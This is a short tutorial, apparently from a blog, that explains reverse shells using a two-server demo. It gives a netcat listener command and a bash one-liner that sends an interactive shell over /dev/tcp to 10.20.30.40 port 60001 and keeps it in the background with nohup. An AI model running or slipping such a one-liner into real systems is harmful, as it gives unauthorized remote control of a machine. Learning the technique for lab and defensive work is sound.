A reverse shell is achieved when you "send" a server's shell (in my demo the server is named
target) to another server (
hq in my setup).
Using this technique you can run
root commands on a server you aren't connected.
# open up a tcp port on the "hq" server to "receive" the reverse shell $ nc -n -l -p 60001
# send the shell from the "target" server to "hq" socket $ nohup /bin/bash >& /dev/tcp/10.20.30.40/60001 0<&1 2>&1 &
# now on "hq" you can run any command hostname # command sent to execution on remote host target # output received from command